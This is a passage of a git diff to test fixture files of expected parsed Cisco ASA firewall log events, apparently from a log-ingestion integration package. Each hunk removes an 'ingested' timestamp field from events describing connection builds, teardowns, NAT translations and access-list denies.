outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14540,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029419153Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14622,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029420142Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14700,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029421265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", @@ -14967,7 +14783,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029422301Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +14867,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.029423268Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +14951,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.029424316Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15032,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029425278Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15110,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029426243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", @@ -15381,7 +15192,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029427333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15270,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029428303Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15355,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.029429347Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15439,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.029430335Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15520,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029431305Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", @@ -15792,7 +15598,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029432270Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15680,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029433374Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15758,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029434415Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -16006,7 +15809,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029435403Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16053,7 +15855,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029436373Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16100,7 +15901,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029437347Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16147,7 +15947,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029438412Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16194,7 +15993,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029439519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16241,7 +16039,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029440787Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16288,7 +16085,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029441775Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16335,7 +16131,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029442754Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16382,7 +16177,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029443726Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16429,7 +16223,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029444784Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16476,7 +16269,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029445896Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16523,7 +16315,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029446902Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16570,7 +16361,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029447875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16617,7 +16407,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029448910Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16664,7 +16453,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029449888Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16742,7 +16530,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029451128Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16608,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029452256Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16873,7 +16659,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029453223Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16920,7 +16705,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029454200Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16999,7 +16783,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029455177Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17083,7 +16866,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029456265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +16950,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.029457444Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17033,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.029458415Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17114,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029459380Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17192,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029460354Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", @@ -17465,7 +17243,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029461720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17512,7 +17289,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029462849Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", @@ -17559,7 +17335,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029464208Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17606,7 +17381,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029465181Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", @@ -17653,7 +17427,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029466194Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17700,7 +17473,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029467162Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", @@ -17747,7 +17519,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029468202Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17828,7 +17599,6 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.029469306Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17680,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029470353Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -17991,7 +17760,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029471341Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +17840,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029472317Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +17920,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029473361Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +17998,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029474336Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18080,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029475438Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18396,7 +18160,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029476438Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18240,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029477422Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18320,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029478457Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18400,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029479443Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18480,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029480465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18801,7 +18560,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029481548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18640,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029482592Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18720,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029483558Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +18800,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029484542Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +18880,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029486354Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19206,7 +18960,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029487359Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19040,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029488397Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19120,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029489363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19200,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029490330Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19280,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029491371Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19611,7 +19360,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029492379Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19440,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029493449Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19520,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029494411Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19600,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029495366Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19680,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029496331Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20016,7 +19760,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029497482Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +19840,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029498516Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +19920,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029499563Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20000,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029500530Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20080,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029501499Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20421,7 +20160,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029502465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20240,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029503559Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20320,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029504661Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20400,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029505637Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20480,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029506618Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20826,7 +20560,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029507589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20640,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029508564Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index 3ba16e735fe..1beb7a817a5 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ 